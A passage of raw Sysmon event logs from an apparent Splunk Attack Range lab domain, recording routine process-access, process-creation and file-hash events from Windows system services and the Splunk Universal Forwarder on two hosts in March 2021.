21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638704Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638703Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638702Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638701Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638700Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638699Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638698Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B864-6058-0500-00000000AF01}628644C:\Windows\system32\csrss.exe{BFB545BB-B43F-605B-325A-00000000AF01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638697Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.881{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B43F-605B-325A-00000000AF01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638696Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.882{BFB545BB-B43F-605B-325A-00000000AF01}3900C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000638695Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.803{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=916501614504259DBCC85C81906BA48F,SHA256=B605EEE05A6D4572617810F181078B5A616D99090A24A2A7D274C1E1282BB282,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638694Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.662{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8796F3BF992807F441411CA3ED5548D0,SHA256=97558EFA6AA2E2B40E7284B6F7E5958D2361D41089FC323F6AA24DC737A10342,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005918414Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:55.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005918413Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:55.749{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005918412Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:50:55.173{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E85BF93F63A3695F588127FE39AC9C7F,SHA256=02926A6ABEC68A20B326633B361194B8535F0E1725F3E0240911680F16FDCA95,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000638693Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B43F-605B-315A-00000000AF01}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638692Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638691Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638690Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638689Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638688Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638687Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638686Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638685Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638684Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638683Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B43F-605B-315A-00000000AF01}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638682Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.366{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B43F-605B-315A-00000000AF01}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638681Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:55.367{BFB545BB-B43F-605B-315A-00000000AF01}2792C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000638680Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:50:50.489{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program 